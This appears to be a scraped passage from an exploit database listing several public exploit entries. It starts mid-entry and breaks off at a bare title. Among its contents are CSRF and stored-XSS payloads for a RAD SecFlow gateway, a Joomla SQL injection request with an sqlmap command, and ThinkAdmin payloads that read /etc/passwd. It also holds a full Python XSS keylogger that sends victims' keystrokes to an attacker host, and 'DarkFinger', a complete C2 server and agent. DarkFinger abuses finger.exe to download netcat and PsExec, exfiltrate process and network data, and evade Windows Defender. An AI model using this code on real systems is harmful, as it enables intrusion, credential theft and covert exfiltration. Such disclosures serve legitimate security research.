local privilege escalation. Tested on: Microsoft Windows 10 Enterprise, x64-based PC Microsoft Windows Server 2016 Standard, x64-based PC Vulnerability discovered by Angelo D'Amato @zeroscience Advisory ID: ZSL-2019-5587 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5587.php 07.08.2020 -- C:\Users\test>sc qc nexposeengine [SC] QueryServiceConfig SUCCESS SERVICE_NAME: nexposeengine TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files\rapid7\nexpose\nse\bin\nxengine.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Nexpose Scan Engine DEPENDENCIES : SERVICE_START_NAME : LocalSystem
-
RAD SecFlow-1v SF_0290_2.3.01.26 - Cross-Site Request Forgery (Reboot)
# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Cross-Site Request Forgery (Reboot) # Date: 2020-08-31 # Exploit Author: Uriel Yochpaz and Jonatan Schor # Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway # Version: SecFlow-1v os-image SF_0290_2.3.01.26 # Tested on: RAD SecFlow-1v # CVE : N/A A vulnerability in the web-based management interface of RAD SecFlow-1v could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. The vulnerability is due to insufficient CSRF protections for the web UI on an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user. This could be exploited in conjunction with CVE-2020-13260. # Proof of Concept By persuading an authenticated user to open a web page containing the following code: <img src="https://SecFlow-1v_IP/devicereboot.php?restart=1&isSubmitted=1"> A reboot operation would begin. This attack could execute any operation available in the web-based management interface (file uploads, scheduled and immediate reboots, factory reset, etc.). # Full Account Takeover As mentioned above, this exploit could be used in conjunction with CVE-2020-13260 (Stored-XSS), by using the CSRF exploit to upload a malicious file to a Stored-XSS vulnerable page, which could allow Full Account Takeover. For further information and full PoC: https://github.com/UrielYochpaz/CVE-2020-13259 # Timeline May 19th, 2020 - Vulnerability exposed. May 19th, 2020 – Vulnerability reported to RAD. May 21st, 2020 – Vulnerability reported to MITRE. May 21st, 2020 – MITRE assigned CVE: CVE-2020-13259. May 22nd, 2020 – Contacted RAD for further details and cooperation. Aug 25th, 2020 – RAD patched the vulnerability.
-
RAD SecFlow-1v SF_0290_2.3.01.26 - Persistent Cross-Site Scripting
# Exploit Title: RAD SecFlow-1v SF_0290_2.3.01.26 - Persistent Cross-Site Scripting # Date: 2020-08-31 # Exploit Author: Jonatan Schor and Uriel Yochpaz # Vendor Homepage: https://www.rad.com/products/secflow-1v-IIoT-Gateway # Version: SecFlow-1v os-image SF_0290_2.3.01.26 # Tested on: RAD SecFlow-1v # CVE : N/A A Stored-XSS vulnerability was found in multiple pages in the web-based management interface of RAD SecFlow-1v. An attacker could exploit this vulnerability by uploading a malicious file as the OVPN file in Configuration-Services-Security-OpenVPN-Config or as the static key file in Configuration-Services-Security-OpenVPN-Static Keys. The content of these files is rendered to users, executing the stored malicious JavaScript code. This could be exploited in conjunction with CVE-2020-13259. # Proof of Concept Upload a file containing the following JS code: <img src=x onerror=alert(1)> Refresh the page and observe the malicious JS code execute every time you browse the compromised page. # Full Account Takeover As mentioned above, this exploit could be used in conjunction with CVE-2020-13259 (CSRF), by using the CSRF exploit to upload a malicious file to a Stored-XSS vulnerable page, which could allow Full Account Takeover. For further information and full PoC: https://github.com/UrielYochpaz/CVE-2020-13259 # Timeline May 19th, 2020 - Vulnerability exposed. May 19th, 2020 – Vulnerability reported to RAD. May 21st, 2020 – Vulnerability reported to MITRE. May 21st, 2020 – MITRE assigned CVE: CVE-2020-13260. May 22nd, 2020 – Contacted RAD for further details and cooperation. Aug 25th, 2020 – RAD patched the vulnerability.
-
Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated)
# Exploit Title: Joomla! paGO Commerce 2.5.9.0 - SQL Injection (Authenticated) # Date: 2020-08-21 # Exploit Author: Mehmet Kelepçe / Gais Cyber Security # Author ID: 8763 # Vendor Homepage: https://www.corephp.com/ # Software Link: https://www.corephp.com/joomla-products/pago-commerce # Version: 2.5.9.0 # Tested on: Apache2 Vulnerable param: filter_published ------------------------------------------------------------------------- POST /joomla/administrator/index.php?option=com_pago&view=comments HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 163 Origin: http://localhost Connection: close Referer: http://localhost/joomla/administrator/index.php?option=com_pago&view=comments Cookie: 4bde113dfc9bf88a13de3b5b9eabe495=sp6rp5mqnihh2i323r57cvesoe; crisp-client%2Fsession%2F0ac26dbb-4c2f-490e-88b2-7292834ac0e9=session_a9697dd7-152d-4b1f-a324-3add3619b1e1 Upgrade-Insecure-Requests: 1 filter_search=&limit=10&filter_published=1&task=&controller=comments&boxchecked=0&filter_order=id&filter_order_Dir=desc&5a672ab408523f68032b7bdcd7d4bb5c=1 ------------------------------------------------------------------------- sqlmap poc: sqlmap -r pago --dbs --risk=3 --level=5 --random-agent -p filter_published [Gais Security]<https://www.gaissecurity.com> [Gais Security] [Gais Security] Mehmet KELEPÇE Penetration Tester | Red Team
-
Tailor MS 1.0 - Reflected Cross-Site Scripting
# Exploit Title: Tailor MS 1.0 - Reflected Cross-Site Scripting # Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) # Date: 2020-09-14 # CVE ID: CVE-2020-23835 # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/tailor.zip # Version: 1.0 # Tested On: Windows 10 Pro + XAMPP | Python 2.7 # OWASP Top Ten 2017: A7:2017-Cross-Site Scripting (XSS) # CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - Type 1: Reflected XSS # CWE-523: Unprotected Transport of Credentials # CVSS Base Score: 6.4 # Impact Subscore: 4.7 # Exploitability Subscore: 1.6 # CVSS v3.1 Vector: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:L # Vulnerability Description: # A Reflected Cross-Site Scripting (XSS) vulnerability in the 'index.php' login-portal webpage of SourceCodester's Tailor Management System v1.0 allows remote attackers to harvest the keystrokes of an unauthenticated victim who opens a malicious URL and then types into the page. 
# Reflected XSS Key Logger import socket,sys,urllib,re from thread import * from colorama import Fore, Style F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE] S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT] ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0] err = S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0] R, C, G = Fore.RED, Fore.CYAN, Fore.GREEN def urlEncode(javascript): return urllib.quote(javascript) def genXssPayload(LHOST,LPORT): XSS_PAYLOAD = '<script>' XSS_PAYLOAD += 'var xhr = new XMLHttpRequest();' XSS_PAYLOAD += 'document.onkeypress = function keyLogger(key) {' XSS_PAYLOAD += 'key_press = String.fromCharCode(key.which);' XSS_PAYLOAD += 'var uri = "http://'+LHOST+':'+LPORT+'?KEY="+key_press;' XSS_PAYLOAD += 'xhr.open("GET", uri, true);' XSS_PAYLOAD += 'xhr.send();}' XSS_PAYLOAD += '</script>' return XSS_PAYLOAD def clientthread(conn): try: while True: data = conn.recv(1024) key = re.findall(r'KEY\=\w',data) key = re.sub('KEY\=','',key[0]) print(printKey(key)) if not data: break except: conn.close() def banner(): BANNER = S[3]+C+' _______ _______ _______ _______ _______ _______ _______ _______ _______ _______ _______ _______ \n' BANNER += C+'|\ /|\ /|\ /| |\ /|\ /|\ /| |\ /|\ /|\ /|\ /|\ /|\ /|\n' BANNER += C+'| +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n' BANNER += C+'| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\n' BANNER += C+'| | '+R+'X'+C+' | | | '+R+'$'+C+' | | | '+R+'$'+C+' | | | | '+R+'K'+C+' | | | '+R+'3'+C+' | | | '+R+'Y'+C+' | | | | '+R+'L'+C+' | | | '+R+'0'+C+' | | | '+R+'G'+C+' | | | '+R+'G'+C+' | | | '+R+'3'+C+' | | | '+R+'R'+C+' | |\n' BANNER += C+'| +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n' BANNER += C+'|/_____\|/_____\|/_____\| |/_____\|/_____\|/_____\| 
|/_____\|/_____\|/_____\|/_____\|/_____\|/_____\|\n\r\n' BANNER += ' '+R+'BOKU '+F[0]+'&'+C+' HYD3SEC'+F[0]+S[0]+'\r\n' return BANNER def printKey(key): keyGen = S[3]+C+' _______\n' keyGen += C+' |\ /|\n' keyGen += C+' | +---+ |\n' keyGen += C+' | | | |\n' keyGen += C+' | | '+R+key+C+' | |\n' keyGen += C+' | +---+ |\n' keyGen += C+' |/_____\|'+F[0]+S[0] return keyGen def header(): head = S[1]+F[2]+' __---* '+F[7]+'Tailor MS v1.0 '+F[2]+'| '+F[7]+'Reflected XSS Key Logger '+F[2]+'*---__\n'+S[0] return head def formatHelp(STRING): return S[3]+F[2]+STRING+S[0] if __name__ == "__main__": print(header()) print(banner()) if len(sys.argv) != 4: print(ok+formatHelp(" Usage: python %s <WEBAPP_URL> <LHOST> <LPORT>" % sys.argv[0])) print(ok+formatHelp(" Example: python %s 'http://172.16.65.134/tailor/' '172.16.65.1' 80\r\n" % sys.argv[0])) print(err+"Try Again..\r\n") sys.exit(-1) WEBAPP_URL = sys.argv[1] LHOST = sys.argv[2] LPORT = sys.argv[3] if not re.match(r".*/$", WEBAPP_URL): WEBAPP_URL = WEBAPP_URL+'/' WEBAPP_URL = WEBAPP_URL+'index.php' PAYLOAD = genXssPayload(LHOST,LPORT) ENCODED_PAYLOAD = urlEncode(PAYLOAD) print(ok+F[0]+'To '+S[3]+F[2]+'Harvest Keys'+F[0]+S[0]+', have a'+F[3]+' User '+F[0]+'visit '+F[5]+'this URL'+F[0]+' and '+F[7]+'Login'+F[0]+':\r\n') print(S[3]+F[5]+WEBAPP_URL+'?error=ALL%20YOUR%20K3Y$%20ARE%20BELONG%20TO%20US.%20'+ENCODED_PAYLOAD+S[0]+'\r\n') LPORT = int(LPORT) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((LHOST,LPORT)) print(ok+S[1]+G+"Binding to Socket."+F[0]+S[0]) s.listen(100) print(ok+S[1]+G+"Listening on Socket for incoming connections."+F[0]+S[0]) try: while 1: conn, addr = s.accept() start_new_thread(clientthread ,(conn,)) except: s.close() print('\r\n'+err+"Exiting Keylogger Credential Harvester..")
-
ThinkAdmin 6 - Arbitrary File Read
# Exploit Title: ThinkAdmin 6 - Arbitrarily File Read # Google Dork: N/A # Date: 2020-09-14 # Exploit Author: Hzllaga # Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/ # Software Link: Before https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784effbf72a2a386c5d25c43a9a # Version: v6 <= 2020.08.03.01 # Tested on: PHP7.4.7,Apache # CVE : CVE-2020-25540 PoC: On Windows read database.php payload: /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34 On Linux read /etc/passwd payload: /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
-
Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software
# Title: Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software # Author: John Page (aka hyp3rlinx) # Date: 2020-09-16 # Website: hyp3rlinx.altervista.org # Source: http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt # twitter.com/hyp3rlinx # ISR: ApparitionSec Microsoft Windows TCPIP Finger Command "finger.exe" that ships with the OS, can be used as a file downloader and makeshift C2 channel. Legitimate use of Windows Finger Command is to send Finger Protocol queries to remote Finger daemons to retrieve user information. However, the finger client can also save the remote server response to disk using the command line redirection operator ">". Intruders who compromise a computer may find it is locked down and "unknown" applications may be unable to download programs or tools. By using built-in native Windows programs, its possible they may be whitelisted by installed security programs and allowed to download files. Redteams and such using LOL methods have made use of "Certutil.exe", native Windows program for downloading files. However, Certutil.exe is recently blocked by Windows Defender Antivirus and logged as event "Trojan:Win32/Ceprolad.A" when it encounters http/https://. Therefore, using Windows finger we can bypass current Windows Defender security restrictions to download tools, send commands and exfil data. The Finger protocol as a C2 channel part works by abusing the "user" token of the FINGER Query protocol "user@host". C2 commands masked as finger queries can download files and or exfil data without Windows Defender interference. Download files: C:\> finger <C2-Command>@HOST > Malwr.txt Exfil running processes: C:\> for /f "tokens=1" %i in ('tasklist') do finger %i@192.168.1.21 Typically, (Port 79) default port used by FINGER protocol is often blocked by organizations. Privileged users can bypass this using Windows NetSh Portproxy. 
This can allow us to bypass Firewall restrictions to reach servers using unrestricted ports like 80/443. Portproxy queries are then sent first to the Local Machines ip-address which are then forwarded to the C2 server specified. Port 43 (WHOIS) traffic. netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=79 connectaddress=[C2-Server] connectport=43 netsh interface portproxy add v4tov4 listenaddress=[LOCAL-IP] listenport=43 connectaddress=[LOCAL-IP] connectport=79 To display Portproxy use "C:\>netsh interface portproxy show all". E.g. using Port 79 Ncat64.exe "nc@C2-Server" > tmp.txt E.g. using Portproxy, send the query to local-ip first. Ncat64.exe "nc@Local-IP" > tmp.txt To leverage Windows finger.exe successfully as a file downloader and help evade network security devices, serve Base64 encoded text-files. DarkFinger.py expects to receive the first two characters of the filename for the Finger Protocol Host token part for file downloads. DarkFinger C2 expects exfil data to prefixed with the dot "." character, so any arbitrary inbound querys are not confused for exfil. This can be changed to whatever or even expanded upon to use XOR obfuscation methods etc... as this is just for basic PoC. [Event Logs / Forensics] Certutil.exe file downloads are now blocked and logged by Windows Defender. "Windows Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software. Name: Trojan:Win32/Ceprolad.A ID: 2147726914 Severity: Severe Category: Trojan ... etc" PowerShell, also used as an LOL method to download files usually generates Windows event logs. Finger initiated downloads write to disk and will leave forensic artifacts. Finger TCP/IP traffic going out to Port 80/443 minus the HTTP protocol may stand out as well. However, searching the Windows event logs for finger.exe entries, I found no trace of it generating Windows event logs anywhere. DarkFinger.py C2 is very basic with no security. 
It's only to demonstrate using Windows Finger Command for as a C2 channel and show the possibilities. Therefore, anyone can request to change the Port DarkFinger C2 listens on and or download files. During my research, I found nothing on the internet publicly using or documenting Windows TCPIP Finger Command for use as C2 channel. Therefore, I release "DarkFinger.py" C2 server and "DarkFinger-Agent.bat" which calls the Windows finger.exe in attacker friendly ways. Tested successfully Windows 10. [DarkFinger-C2.py] import socket,sys,re,time,os,argparse from subprocess import * from subprocess import Popen, PIPE, STDOUT #DarkFinger / Windows Finger TCPIP Command C2 Server (c) #Downloader and Covert Data Tunneler #By John Page (aka hyp3rlinx) #ApparitionSec #twitter.com/hyp3rlinx # #File Downloads must be Base64 encoded text-files. #Agents can change the port DarkFinger listens on dynamically: #E.g. set to listen on port 80 #C:\>finger.exe !80!@DarkFinger-Server #When not using Port 79, we need a Portproxy to send Port 79 traffic outbound to the specified Port. #Also, when using Ports other than Port 79 (default) we issue queries first to the machine running the Agent E.g. #C:\>finger.exe <Command>@<Local-Machines-IP> # #Agents can change the Download wait time, to try an ensure files are fully downloaded before closing connections. #Default time sent by the DF-Agent.bat PoC script is set to 10 seconds when issuing Download commands. #Changing wait time before closing the socket when downloading PsExec64.exe E.g. #C:\>finger.exe ps%<Wait-Time-Secs>%@%<DarkFinger-Server>% #============================================================================================================== # port = 79 #Default if the client unable to Portproxy, use port 80/443 if possible. 
downloads_dir = "Darkfinger_Downloads" #Directory containing the Base64 encoded files for download nc64 = downloads_dir+"\\nc.txt" #Base64 encoded Netcat psexec = downloads_dir+"\\ps.txt" #Base64 encoded PsExec64 byte_sz = 4096 #Socket recv allowed_ports = [22,43,53,79,80,443] #Restrict to a few. BANNER=""" ____ __ _______ / __ \____ ______/ /__/ ____(_)___ ____ ____ _____ / / / / __ `/ ___/ //_/ /_ / / __ \/ __ `/ _ \/ ___/ / /_/ / /_/ / / / ,< / __/ / / / / / /_/ / __/ / /_____/\__,_/_/ /_/|_/_/ /_/_/ /_/\__, /\___/_/ /____/ v1 Finger TCPIP Command C2 Server By hyp3rlinx ApparitionSec """ def remove_cert_info(f): try: r1 = open(f) lines = r1.readlines() lines = lines[1:] r1.close() w1 = open(f,'w') w1.writelines(lines) w1.close() r2 = open(f) lines2 = r2.readlines() lines2 = lines2[:-1] r2.close() w2 = open(f,'w') w2.writelines(lines2) w2.close() except Exception as e: print(str(e)) exit() def create_base64_files(file_conf): global downloads_dir if os.path.exists(file_conf): if os.stat(file_conf).st_size == 0: print("[!] Warn: Supplied conf file is empty, no downloads were specified!") exit() else: print("[!] Supplied conf file does not exist :(") exit() try: path=os.getcwd() if not os.path.exists(path+"\\"+downloads_dir): os.makedirs(downloads_dir) f=open(file_conf, "r") for x in f: x = x.strip() if os.path.exists(path+"\\"+x): proc = Popen(["certutil.exe", "-encode", path+"\\"+x, path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt"], stdout=PIPE, stderr=PIPE, shell=False) out, err = proc.communicate() if "ERROR_FILE_EXISTS" in str(out): print("[!] Cannot encode " + x[:2]+".txt" + " as it already exists, delete it (-d flag) and try again :(") exit() time.sleep(0.5) #Remove certificate info generated by Windows Certutil. 
if os.path.exists(path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt"): remove_cert_info(path+"\\"+downloads_dir+"\\"+x[:2].lower()+".txt") print("[+] Created " + x + " Base64 encoded text-file "+x[:2].lower()+".txt" +" for download.") else: print("[!] Warn: File specified in the conf file to Base64 encode ("+x+") does not exist!") exit() f.close() except Exception as e: print(str(e)) def delete_base64_files(): global downloads_dir path=os.getcwd() if os.path.exists(path+"\\"+downloads_dir): try: filelist = [ f for f in os.listdir(path+"\\"+downloads_dir) if f.endswith(".txt") ] for f in filelist: os.remove(os.path.join(path+"\\"+downloads_dir, f)) except Exception as e: print(str(e)) exit() def B64Exec(t): payload="" try: f=open(t, "r") for x in f: payload += x f.close() except Exception as e: pass print(str(e)) return 9 return payload def finga_that_box(cmd, victim): cmd = cmd.rstrip() if cmd[:1] != ".": cmd = cmd[0:2] if cmd == "nc": print("[+] Serving Nc64.exe") sys.stdout.flush() return nc64 if cmd == "ps": print("[+] Serving PsExec64.exe") sys.stdout.flush() return psexec if cmd[:1] == ".": print("[+] Exfil from: "+ victim[0] + " " +cmd[1:]) sys.stdout.flush() return False def fileppe_fingaz(): global byte_sz, port, allowed_ports delay=1 s = socket.socket() host = "" try: if port in allowed_ports: s.bind((host, port)) s.listen(5) else: print("[!] Port disallowed, you can add it to the 'allowed_ports' list.") exit() except Exception as e: print(str(e)) exit() print("[/] Listening port:", str(port)) sys.stdout.flush() try: while True: conn, addr = s.accept() a = conn.recv(byte_sz).decode() #Py 2 #Let agent change port dynamically try: if a[:1]=="!": idx = a.rfind("!") if idx != -1: port = str(a[1:idx]) if int(port) in allowed_ports: port = int(port) time.sleep(1) conn.close() s.close() fileppe_fingaz() else: print("[!] Disallowed port change request from: %s" % addr[0]) #Let agent set time to wait dynamically. if a[:1] != "." 
and a[:1] != "!": if re.search(r'\d\d', a[2:4]): delay=int(a[2:4]) print("[-] Agent set the delay to: %d" % delay) sys.stdout.flush() except Exception as e: print(str(e)) pass t = finga_that_box(a, addr) if t: exe = B64Exec(t) if exe == 9: conn.close() continue if exe: try: conn.sendall(exe.encode()) time.sleep(delay) conn.close() delay=1 except Exception as e: pass #print(str(e)) sys.stdout.flush() conn.close() delay=1 s.close() except Exception as e: print(str(e)) pass finally: s.close() fileppe_fingaz() def about(): print("[+] Darkfinger is a basic C2 server that processes Windows TCPIP Finger Commands.") print(" ") print("[+] File download requests require the first two chars (lowercase) for the file we want,") print("[+] plus the wait time, this trys to ensure a full transmit before close the connection.") print("[+] Download Ncat64.exe and wait 30-secs before closing the socket:") print("[+] finger.exe nc30@DarkFinger > tmp.txt") print(" ") print("[+] Exfil Windows Tasklist using the '.' character used as the DarkFinger exfil flag:") print("[+] cmd /c for /f \"tokens=1\" %i in ('tasklist') do finger .%i@DarkFinger-Server") print("[+]") print("[+] If Port 79 is blocked, use Windows Netsh Portproxy to reach allowed internet Ports.") print("[+] Dynamically change the port Darkfinger C2 listens on to port 80:") print("[+] finger.exe !80!@DarkFinger-Server") print(" ") print("[+] DarkFinger-Agent.bat script is the client side component to demonstrate capabilities.") print("[+] Note: This is just a basic PoC with no type of real security whatsoever.") print("[+] Disclaimer: Author not responsible for any misuse and or damages by using this software.") def main(args): global port print(BANNER) if len(sys.argv)==1: parser.print_help(sys.stderr) sys.exit(1) if args.about: about() exit() if args.port: port = int(args.port) if args.conf and args.delete: delete_base64_files() if args.conf: create_base64_files(args.conf) else: print("[!] 
Warn: No Base64 files created for download!, add required -c flag.") exit() fileppe_fingaz() def parse_args(): parser.add_argument("-p", "--port", help="C2 Server Port", nargs="?") parser.add_argument("-c", "--conf", help="Textfile of tools to Base64 encode for download.", nargs="?") parser.add_argument("-d", "--delete", nargs="?", const="1", help="Delete previously created Base64 encoded files on startup, -c required.") parser.add_argument("-a", "--about", nargs="?", const="1", help="Darkfinger information") return parser.parse_args() if __name__ == "__main__": parser = argparse.ArgumentParser() main(parse_args()) [DarkFinger-Agent.bat] @ECHO OFF CLS ECHO [+] Windows TCPIP Finger CMD Agent (c) ECHO [+] For DarkFinger C2 Server PoC ECHO [+] By hyp3rlinx ECHO [+] ApparitionSec ECHO =================================== @ECHO. REM Default download save location. CD \Users\%username%\Desktop REM Default download delay time to try an ensure full transfer. SET DELAY=10 SET FAIL_MSG=[!] Attempted a failed Admin operation ugh :( net session >nul 2>&1 IF %errorLevel% == 0 ( ECHO [+] Got Admin privileges!. SET /a Admin = 0 GOTO Init ) ELSE ( ECHO [!] Agent running as non-admin, if you can escalate privs re-run the agent!. SET /a Admin = 1 SET DARK_PORT=79 GOTO CheckOutbound79 ) :Init for /f "tokens=1-2 delims=:" %%a in ('ipconfig^|find "IPv4"') do IF NOT DEFINED LOCAL_IP set LOCAL_IP=%%b SET LOCAL_IP=%LOCAL_IP: =% ECHO [+] Local IP: %LOCAL_IP% REM default for non admin as cant set Portproxy. SET /P DARK_IP="[+] DarkFinger C2 Host/IP: " SET /P DARK_PORT="[+] DarkFinger C2 Port: " IF NOT %DARK_PORT%==79 ( ECHO [!] Ports other than 79 typically require a Portproxy. GOTO AddNetshPortProxy ) ELSE ( GOTO CmdOpt ) :CheckOutbound79 ECHO [!] Must use the default Port 79 :( good luck. SET /P CHKPORT="[+] Check if hosts reachable? 
Y to continue N to abort: " SET CHKPORT=%CHKPORT: =% IF /I %CHKPORT% == y ( SET /P DARK_IP="[+] DarkFinger C2 Host/IP: " cmd /c powershell "$c=New-Object System.Net.Sockets.TCPClient;try{$c.Connect('%DARK_IP%','%DARK_PORT%')}catch{};if(-Not $c.Connected){echo `n'[-] Port 79 unreachable :('}else{$c.Close();echo `n'[-] Port 79 reachable :)'}" ECHO. ) ELSE ( ECHO [!] Aborting... :( GOTO Close ) :CmdOpt ECHO 1.Download PsExec64 ECHO 2.Download Nc64 ECHO 3.Exfil Tasklist ECHO 4.Exfil IP Config ECHO 5.Remove Netsh PortProxy ECHO 6.Change C2 Server Port - 22 43 53 79 80 443 ECHO 7.Show Current Portproxy ECHO 8.Change Portproxy ECHO 9.Delete Portproxy and exit ECHO 10.Exit Agent @ECHO. SET /P doit="Select option: " IF "%doit%"=="1" GOTO PsExec64 IF "%doit%"=="2" GOTO Nc64 IF "%doit%"=="3" GOTO ExfilTasklist IF "%doit%"=="4" GOTO ExfilIPConfig IF "%doit%"=="5" GOTO RemNetShPortProxy IF "%doit%"=="6" GOTO ChgC2ServerPort IF "%doit%"=="7" GOTO ShowPortProxy IF "%doit%"=="8" GOTO ChgPortProxy IF "%doit%"=="9" GOTO DelProxyNClose IF "%doit%"=="10" GOTO Close :ChgPortProxy IF %Admin% == 0 ( GOTO Init ) ELSE ( ECHO %FAIL_MSG% @ECHO. GOTO CmdOpt ) :PsExec64 SET Tool=PS ECHO [-] Downloading PsExec64.exe, saving to Desktop as PS.EXE ECHO [-] Wait... IF %DARK_PORT%==79 ( SET IP2USE=%DARK_IP% ) ELSE ( SET IP2USE=%LOCAL_IP% ) call finger ps%DELAY%@%IP2USE% > tmp.txt GOTO CleanFile :Nc64 SET Tool=NC ECHO [-] Downloading Nc64.exe, saving to Desktop as NC.EXE ECHO [-] Wait... IF %DARK_PORT%==79 ( SET IP2USE=%DARK_IP% ) ELSE ( SET IP2USE=%LOCAL_IP% ) call finger nc%DELAY%@%IP2USE% > tmp.txt GOTO CleanFile REM remove first two lines of tmp.txt as contains Computer name. :CleanFile call cmd /c more +2 tmp.txt > %Tool%.txt GOTO RemoveTmpFile :RemoveTmpFile call cmd /c del %CD%\tmp.txt GOTO B64Exe REM Reconstruct executable from the Base64 text-file. :B64Exe call certutil -decode %CD%\%Tool%.txt %CD%\%Tool%.EXE 1> nul @ECHO. 
call cmd /c del %CD%\%Tool%.txt GOTO CmdOpt :ExfilTasklist REM uses "." prefix to flag as incoming exfil data. IF "%DARK_PORT%"=="79" ( SET USE_IP=%DARK_IP% ) ELSE ( SET USE_IP=%LOCAL_IP% ) cmd /c for /f "tokens=1" %%i in ('tasklist') do finger ."%%i"@%USE_IP% GOTO CmdOpt :ExfilIPConfig REM uses "." prefix to flag as incoming exfil data. IF "%DARK_PORT%"=="79" ( SET USE_IP=%DARK_IP% ) ELSE ( SET USE_IP=%LOCAL_IP% ) cmd /c for /f "tokens=*" %%a in ('ipconfig /all') do finger ".%%a"@%USE_IP% GOTO CmdOpt :DelProxyNClose ECHO [!] Removing any previous Portproxy from registry and exiting. REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1 ECHO [!] Exiting... EXIT /B :AddNetshPortProxy SET OK=0 SET /P OK="[!] 1 to Continue:" IF NOT %OK% EQU 1 ( ECHO [!] Aborted... @ECHO. GOTO CmdOpt ) ECHO [!] Removing any previous Portproxy from registry. REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1 SET LOCAL_FINGER_PORT=79 IF %DARK_PORT%==79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%LOCAL_FINGER_PORT% connectaddress=%DARK_IP% connectport=%DARK_PORT% IF %DARK_PORT%==79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%DARK_PORT% connectaddress=%LOCAL_IP% connectport=%LOCAL_FINGER_PORT% IF NOT %DARK_PORT% == 79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%LOCAL_FINGER_PORT% connectaddress=%DARK_IP% connectport=%DARK_PORT% IF NOT %DARK_PORT% == 79 call cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%DARK_PORT% connectaddress=%LOCAL_IP% connectport=%LOCAL_FINGER_PORT% IF %Admin% == 0 netsh interface portproxy show all GOTO CmdOpt :RemNetShPortProxy IF %Admin% == 1 ( ECHO %FAIL_MSG% @ECHO. GOTO CmdOpt ) ELSE ( ECHO [!] Removing NetSh PortProxy from registry. 
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1 ) IF %DARK_PORT%==79 ( GOTO CmdOpt ) ELSE ( GOTO Init ) :ShowPortProxy netsh interface portproxy show all GOTO CmdOpt REM Allows agent to change the DarkFinger C2 listener port. :ChgC2ServerPort IF %Admin% == 1 ( ECHO %FAIL_MSG% @ECHO. GOTO CmdOpt ) SET /P TMP_PORT="[+] DarkFinger listener Port: " IF %DARK_PORT%==79 finger !%TMP_PORT%!@%DARK_IP% IF NOT %DARK_PORT%==79 finger !%TMP_PORT%!@%LOCAL_IP% SET DARK_PORT=%TMP_PORT% ECHO [!] Attempted to change the DarkFinger remote Port to %TMP_PORT%. IF NOT %DARK_PORT%==79 ECHO [!] Non default finger port used, must set a new Portproxy. ( GOTO RemNetShPortProxy ) ELSE ( GOTO CmdOpt ) :Close EXIT /B [PoC Video URL] https://www.youtube.com/watch?v=cfbwS6zH7ks [Network Access] Remote [Disclosure Timeline] September 11, 2020 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
-
Piwigo 2.10.1 - Cross Site Scripting
